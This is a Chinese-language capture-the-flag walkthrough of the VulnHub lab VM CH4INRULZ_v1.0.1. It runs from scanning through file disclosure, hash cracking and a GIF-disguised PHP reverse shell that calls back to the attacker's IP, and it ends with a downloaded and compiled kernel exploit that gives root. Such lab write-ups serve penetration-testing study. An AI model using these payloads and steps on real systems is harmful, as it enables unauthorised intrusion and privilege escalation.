OSCP - CH4INRULZ_v1.0.1 的破解

·  阅读 126

本文主要记录对 CH4INRULZ_v1.0.1 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com 博客集:面向 CTF 的 OSCP 破解系列 下载链接:CH4INRULZ_v1.0.1

  1. 系统为DHCP,不知道IP,可以使用 netdiscover

     root@kali:~# netdiscover -r 10.10.10.0/24
     Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                               
                                                                                                                                                                  
      6 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 360                                                                                             
      _____________________________________________________________________________
        IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
      -----------------------------------------------------------------------------
      10.10.10.1      00:50:56:c0:00:08      2     120  VMware, Inc.                                                                                              
      10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.                                                                                              
      10.10.10.168    00:0c:29:15:19:a3      2     120  VMware, Inc.                                                                                              
      10.10.10.254    00:50:56:e8:71:43      1      60  VMware, Inc.  
    复制代码
  2. 发现IP为 10.10.10.168,下面进行端口发现

     root@kali:~# nmap -A 10.10.10.168 -p 1-65535 -T4
     Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 22:53 EST
     Nmap scan report for 10.10.10.168
     Host is up (0.00039s latency).
     Not shown: 65531 closed ports
     PORT     STATE SERVICE VERSION
     21/tcp   open  ftp     vsftpd 2.3.5
     |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
     | ftp-syst: 
     |   STAT: 
     | FTP server status:
     |      Connected to 10.10.10.166
     |      Logged in as ftp
     |      TYPE: ASCII
     |      No session bandwidth limit
     |      Session timeout in seconds is 300
     |      Control connection is plain text
     |      Data connections will be plain text
     |      At session startup, client count was 3
     |      vsFTPd 2.3.5 - secure, fast, stable
     |_End of status
     22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
     | ssh-hostkey: 
     |   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
     |   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
     |_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
     80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
     |_http-server-header: Apache/2.2.22 (Ubuntu)
     |_http-title: FRANK's Website | Under development
     8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
     |_http-server-header: Apache/2.2.22 (Ubuntu)
     |_http-title: Site doesn't have a title (text/html).
     MAC Address: 00:0C:29:15:19:A3 (VMware)
     Device type: general purpose
     Running: Linux 2.6.X
     OS CPE: cpe:/o:linux:linux_kernel:2.6
     OS details: Linux 2.6.19 - 2.6.36
     Network Distance: 1 hop
     Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
     
     TRACEROUTE
     HOP RTT     ADDRESS
     1   0.39 ms 10.10.10.168
     
     OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
     Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds
    复制代码

    探测发现存在21、22、80、8011端口,首先对 21 端口进行排查

     PS C:\Users\John> ftp 10.10.10.168
     连接到 10.10.10.168220 (vsFTPd 2.3.5)
     200 Always in UTF8 mode.
     用户(10.10.10.168:(none)): Anonymous
     331 Please specify the password.
     密码:
     230 Login successful.
     ftp>
     ftp> ls -la
    复制代码

    ftp 服务器未发现有价值的线索,另外,vsftpd的版本未发现现有的漏洞

     root@kali:~# searchsploit vsftpd
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
      Exploit Title                                                                                                       |  Path
                                                                                                                          | (/usr/share/exploitdb/)
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
     vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                       | exploits/linux/dos/5814.pl
     vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                       | exploits/windows/dos/31818.sh
     vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                       | exploits/windows/dos/31819.pl
     vsftpd 2.3.2 - Denial of Service                                                                                     | exploits/linux/dos/16270.c
     vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                               | exploits/unix/remote/17491.rb
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
     Shellcodes: No Result
     root@kali:~# 
    复制代码

    22 端口的 opensshOpenSSH 5.9p1 Debian 5ubuntu1.10 也没发现版本漏洞

  3. 下面对 8011 端口进行测试

    使用 dirb 进行目录暴破

     oot@kali:~# dirb http://10.10.10.168:8011
     
     -----------------
     DIRB v2.22    
     By The Dark Raver
     -----------------
     
     START_TIME: Mon Mar  4 23:15:57 2019
     URL_BASE: http://10.10.10.168:8011/
     WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
     
     -----------------
     
     GENERATED WORDS: 4612                                                          
     
     ---- Scanning URL: http://10.10.10.168:8011/ ----
     ==> DIRECTORY: http://10.10.10.168:8011/api/                                                                                                                 
     + http://10.10.10.168:8011/index.html (CODE:200|SIZE:30)                                                                                                     
     + http://10.10.10.168:8011/server-status (CODE:403|SIZE:295)                                                                                                 
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168:8011/api/ ----
     + http://10.10.10.168:8011/api/index.html (CODE:200|SIZE:351)                                                                                                
                                                                                                                                                                  
     -----------------
     END_TIME: Mon Mar  4 23:16:02 2019
     DOWNLOADED: 9224 - FOUND: 3
    复制代码

    使用 nikto 进行漏洞扫描

     oot@kali:~# nikto -C all -h 10.10.10.168:8011
     - Nikto v2.1.6
     ---------------------------------------------------------------------------
     + Target IP:          10.10.10.168
     + Target Hostname:    10.10.10.168
     + Target Port:        8011
     + Start Time:         2019-03-04 23:16:04 (GMT-5)
     ---------------------------------------------------------------------------
     + Server: Apache/2.2.22 (Ubuntu)
     + Server leaks inodes via ETags, header found with file /, inode: 1052109, size: 30, mtime: Sat Apr 14 08:00:08 2018
     + The anti-clickjacking X-Frame-Options header is not present.
     + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
     + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
     + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
     + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
     + OSVDB-3233: /icons/README: Apache default file found.
     + 26131 requests: 0 error(s) and 7 item(s) reported on remote host
     + End Time:           2019-03-04 23:17:16 (GMT-5) (72 seconds)
     ---------------------------------------------------------------------------
     + 1 host(s) tested
    复制代码

    对以上扫描结果进行访问测试,发现 http://10.10.10.168:8011/api/index.html 有提示信息

    在这里插入图片描述

    分别对提示中的四个页面进行测试,发现 http://10.10.10.168:8011/api/files_api.php 有回显信息,并且提示信息中提到了 file 参数

    在这里插入图片描述

    下面对file 参数进行测试,查看是否可以利用,比如访问“http://10.10.10.168:8011/api/files_api.php?file=/etc/passwd”,发现有拦截,说明这里应该是可以利用的

    在这里插入图片描述

    下面尝试使用命令行来进行测试

     root@kali:~# curl -X POST -d "file=/etc/passwd" http://10.10.10.168:8011/api/files_api.php
     
     <head>
       <title>franks website | simple website browser API</title>
     </head>
     
     root:x:0:0:root:/root:/bin/bash
     bin:x:2:2:bin:/bin:/bin/sh
     sys:x:3:3:sys:/dev:/bin/sh
     sync:x:4:65534:sync:/bin:/bin/sync
     games:x:5:60:games:/usr/games:/bin/sh
     man:x:6:12:man:/var/cache/man:/bin/sh
     lp:x:7:7:lp:/var/spool/lpd:/bin/sh
     mail:x:8:8:mail:/var/mail:/bin/sh
     news:x:9:9:news:/var/spool/news:/bin/sh
     uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
     proxy:x:13:13:proxy:/bin:/bin/sh
     www-data:x:33:33:www-data:/var/www:/bin/sh
     backup:x:34:34:backup:/var/backups:/bin/sh
     list:x:38:38:Mailing List Manager:/var/list:/bin/sh
     irc:x:39:39:ircd:/var/run/ircd:/bin/sh
     gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
     nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
     libuuid:x:100:101::/var/lib/libuuid:/bin/sh
     syslog:x:101:103::/home/syslog:/bin/false
     frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
     sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
     ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false
    复制代码
  4. 下面对 80 端口进行探测

    首先使用 dirb 对网站进行目录爆破

     oot@kali:~# dirb http://10.10.10.168
     
     -----------------
     DIRB v2.22    
     By The Dark Raver
     -----------------
     
     START_TIME: Mon Mar  4 23:06:36 2019
     URL_BASE: http://10.10.10.168/
     WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
     
     -----------------
     
     GENERATED WORDS: 4612                                                          
     
     ---- Scanning URL: http://10.10.10.168/ ----
     + http://10.10.10.168/cgi-bin/ (CODE:403|SIZE:288)                                                                                                           
     ==> DIRECTORY: http://10.10.10.168/css/                                                                                                                      
     + http://10.10.10.168/development (CODE:401|SIZE:479)                                                                                                        
     ==> DIRECTORY: http://10.10.10.168/img/                                                                                                                      
     + http://10.10.10.168/index (CODE:200|SIZE:334)                                                                                                              
     + http://10.10.10.168/index.html (CODE:200|SIZE:13516)                                                                                                       
     ==> DIRECTORY: http://10.10.10.168/js/                                                                                                                       
     + http://10.10.10.168/LICENSE (CODE:200|SIZE:1093)                                                                                                           
     + http://10.10.10.168/robots (CODE:200|SIZE:21)                                                                                                              
     + http://10.10.10.168/robots.txt (CODE:200|SIZE:21)                                                                                                          
     + http://10.10.10.168/server-status (CODE:403|SIZE:293)                                                                                                      
     ==> DIRECTORY: http://10.10.10.168/vendor/                                                                                                                   
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168/css/ ----
     (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
         (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168/img/ ----
     (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
         (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168/js/ ----
     (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
         (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168/vendor/ ----
     (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
         (Use mode '-w' if you want to scan it anyway)
                                                                                    
     -----------------
     END_TIME: Mon Mar  4 23:06:39 2019
     DOWNLOADED: 4612 - FOUND: 8
    复制代码

    发现目录cgi-bin、development、css、img、js、vendor目录,重点发现需要密码验证的目录(后台页面)

     root@kali:~# dirb http://10.10.10.168 | grep "CODE:401"
     + http://10.10.10.168/development (CODE:401|SIZE:479)                 
    复制代码

    然后使用 nikto 对网站进行扫描

     root@kali:~# nikto -C all -h 10.10.10.168
     - Nikto v2.1.6
     ---------------------------------------------------------------------------
     + Target IP:          10.10.10.168
     + Target Hostname:    10.10.10.168
     + Target Port:        80
     + Start Time:         2019-03-04 23:08:04 (GMT-5)
     ---------------------------------------------------------------------------
     + Server: Apache/2.2.22 (Ubuntu)
     + Server leaks inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 09:39:32 2018
     + The anti-clickjacking X-Frame-Options header is not present.
     + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
     + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
     + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
     + Uncommon header 'tcn' found, with contents: list
     + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak
     + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
     + OSVDB-3268: /img/: Directory indexing found.
     + OSVDB-3092: /img/: This might be interesting...
     + OSVDB-3233: /icons/README: Apache default file found.
     + 26280 requests: 0 error(s) and 11 item(s) reported on remote host
     + End Time:           2019-03-04 23:09:13 (GMT-5) (69 seconds)
     ---------------------------------------------------------------------------
     + 1 host(s) tested
    复制代码

    发现 img 目录和 /icons/README 文件,另外提示 index 有两个文件:“index.html”和“index.html.bak”

    下载此文件:

     root@kali:~# wget http://10.10.10.168/index.html.bak
     --2019-03-04 23:36:01--  http://10.10.10.168/index.html.bak
     Connecting to 10.10.10.168:80... connected.
     HTTP request sent, awaiting response... 200 OK
     Length: 334 [application/x-trash]
     Saving to: ‘index.html.bak’
     
     index.html.bak                          100%[=============================================================================>]     334  --.-KB/s    in 0s      
     
     2019-03-04 23:36:01 (71.7 MB/s) - ‘index.html.bak’ saved [334/334]
     
     root@kali:~# cat index.html.bak 
     <html><body><h1>It works!</h1>
     <p>This is the default web page for this server.</p>
     <p>The web server software is running but no content has been added, yet.</p>
     <a href="/development">development</a>
     <!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
     </body></html>
     
    复制代码

    查看内容,可以看到用户名和密码 frank:apr1apr11oIGDEDK$/aVFPluYt56UvslZMBDoC0

    或者是执行命令

     root@kali:~# curl -X POST -d "file=/etc/.htpasswd" http://10.10.10.168:8011/api/files_api.php
     
     <head>
       <title>franks website | simple website browser API</title>
     </head>
     
     frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
    复制代码

    对上面的账号密码进行暴力猜解:

    frank:apr1apr11oIGDEDK$/aVFPluYt56UvslZMBDoC0

    可以使用 hash-identifier,判断 hash类型,然后使用 john the rapper 暴力猜解

     root@kali:~# hash-identifier 
        #########################################################################
        #	 __  __ 		    __		 ______    _____	   #
        #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
        #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
        #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
        #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
        #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
        #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
        #								 By Zion3R #
        #							www.Blackploit.com #
        #						       Root@Blackploit.com #
        #########################################################################
     
        -------------------------------------------------------------------------
      HASH: $apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
     
     Possible Hashs:
     [+]  MD5(APR)
     
        -------------------------------------------------------------------------
    复制代码

    然后使用 john 爆破密码,john 的使用格式是将密码复制进文件然后进行猜解的

     root@kali:~# cat hash.txt 
     frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
     
     root@kali:~# john hash.txt 
     Using default input encoding: UTF-8
     Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3])
     Will run 2 OpenMP threads
     Proceeding with single, rules:Wordlist
     Press 'q' or Ctrl-C to abort, almost any other key for status
     Warning: Only 22 candidates buffered for the current salt, minimum 48
     needed for performance.
     Warning: Only 33 candidates buffered for the current salt, minimum 48
     needed for performance.
     frank!!!         (frank)
     1g 0:00:00:00 DONE 1/3 (2019-03-05 00:05) 50.00g/s 9950p/s 9950c/s 9950C/s FRANK1..gfrank
     Use the "--show" option to display all of the cracked passwords reliably
     Session completed
    复制代码

    现在我们有了密码frank:frank!!!,使用密码登录 development 目录

    在这里插入图片描述

    找到关键词 uploader ,尝试作为路径访问

    在这里插入图片描述

    猜测应该有文件上传漏洞,进行登录测试,上传发现只支持图片格式

    在这里插入图片描述

    在 kali 中找一个 php 反弹木马尝试上传,格式化成 GIF98 文件头的图片格式

     root@kali:~# cat reerse_php.gif 
     	GIF98
     	<?php
     	$sock=fsockopen("10.10.10.166",4444);
     	exec("/bin/sh -i <&3 >&3 2>&3");
     	?>
    复制代码

    上传成功:

    在这里插入图片描述

    但是即使上传成功,也不能利用,这时候尝试目录爆破。经过目录暴破发现还存在目录“http://10.10.10.168/development/uploader/FRANKuploads/”

    不知道 FRANKuploads 是哪里来的,仅新增一张图,其他的未做改变。

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

    在kali 打开监听端口,然后访问反弹shell 的图片

     root@kali:~# nc -nvlp 4444
     retrying local 0.0.0.0:4444 : Address already in use
    复制代码

    另一个窗口打开:

     curl -X POST -d file=/var/www/development/uploader/FRANKuploads/reerse_php.gif 10.10.10.168:8011/api/files_api.php
    复制代码

    此时发现建立的连接,连上就断开了,判断是 反弹webshell 有问题,所以使用一个kali官方的反弹 shell: /usr/share/webshells/php/php-reverse-shell.php

    修改文件头为 GIF98,修改文件后缀为 gif,开始上传。

  5. 反弹shell

    使用 msf 或者 nc 设置监听 4444 端口,设置反弹 shell 的端口为 4444,监听

     root@kali:~# nc -nvlp 4444
     listening on [any] 4444 ...
     
    复制代码

    新窗口访问

     root@kali:~/Desktop# curl -X POST -d file=/var/www/development/uploader/FRANKuploads/php-reverse-shell4.gif  10.10.10.168:8011/api/files_api.php
    复制代码

    获得shell

     root@kali:~# nc -nvlp 4444
     listening on [any] 4444 ...
     connect to [10.10.10.166] from (UNKNOWN) [10.10.10.168] 37548
     Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
      06:26:47 up  2:36,  0 users,  load average: 0.00, 0.01, 1.64
     USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
     uid=33(www-data) gid=33(www-data) groups=33(www-data)
     /bin/sh: can't access tty; job control turned off
    复制代码

    更换为 bash

     $ python -c 'import pty; pty.spawn("/bin/bash")' 
     www-data@ubuntu:/$ id
     id
     uid=33(www-data) gid=33(www-data) groups=33(www-data)
    复制代码
  6. 提权

    查看内核版本

     www-data@ubuntu:/home/frank$ uname -a
     uname -a
     Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
     
    复制代码

    搜索内核版本漏洞

     root@kali:~# searchsploit linux 2.6.35
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
      Exploit Title                                                                                                       |  Path
                                                                                                                          | (/usr/share/exploitdb/)
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
     Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service                                                     | exploits/linux/dos/36425.txt
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
     Shellcodes: No Result
    复制代码

    在 kali 设置简单的 HTTP 服务器

     root@kali:/var/www/html# python -m SimpleHTTPServer 80
    复制代码

    靶机执行命令

     www-data@ubuntu:/var/www$ cd /var/tmp
     cd /var/tmp
     www-data@ubuntu:/var/tmp$ wget http://10.10.10.166/15285.c     
     wget http://10.10.10.166/15285.c
     --2019-03-05 06:51:42--  http://10.10.10.166/15285.c
     Connecting to 10.10.10.166:80... connected.
     HTTP request sent, awaiting response... 200 OK
     Length: 7155 (7.0K) [text/x-csrc]
     Saving to: `15285.c'
     
     100%[======================================>] 7,155       --.-K/s   in 0s      
     
     2019-03-05 06:51:42 (68.9 MB/s) - `15285.c' saved [7155/7155]
     
     www-data@ubuntu:/var/tmp$ ls
     ls
     15285.c
     		
     www-data@ubuntu:/var/tmp$ ls
     ls
     15285.c
     www-data@ubuntu:/var/tmp$ gcc 15285.c -o 15285
     gcc 15285.c -o 15285
     www-data@ubuntu:/var/tmp$ chmod 777 15285
     chmod 777 15285
     www-data@ubuntu:/var/tmp$ ./15285
     ./15285
     [*] Linux kernel >= 2.6.30 RDS socket exploit
     [*] by Dan Rosenberg
     [*] Resolving kernel addresses...
      [+] Resolved security_ops to 0xffffffff81ce8df0
      [+] Resolved default_security_ops to 0xffffffff81a523e0
      [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
      [+] Resolved commit_creds to 0xffffffff810852b0
      [+] Resolved prepare_kernel_cred to 0xffffffff81085780
     [*] Overwriting security ops...
     [*] Overwriting function pointer...
     [*] Triggering payload...
     [*] Restoring function pointer...
     [*] Got root!
     # 
     # python -c 'import pty; pty.spawn("/bin/bash")' 
     
     root@ubuntu:/var/tmp# id
     id
     uid=0(root) gid=0(root) groups=0(root)
    复制代码

    至此,已完成。

分类:
后端
标签:
收藏成功!
已添加到「」, 点击更改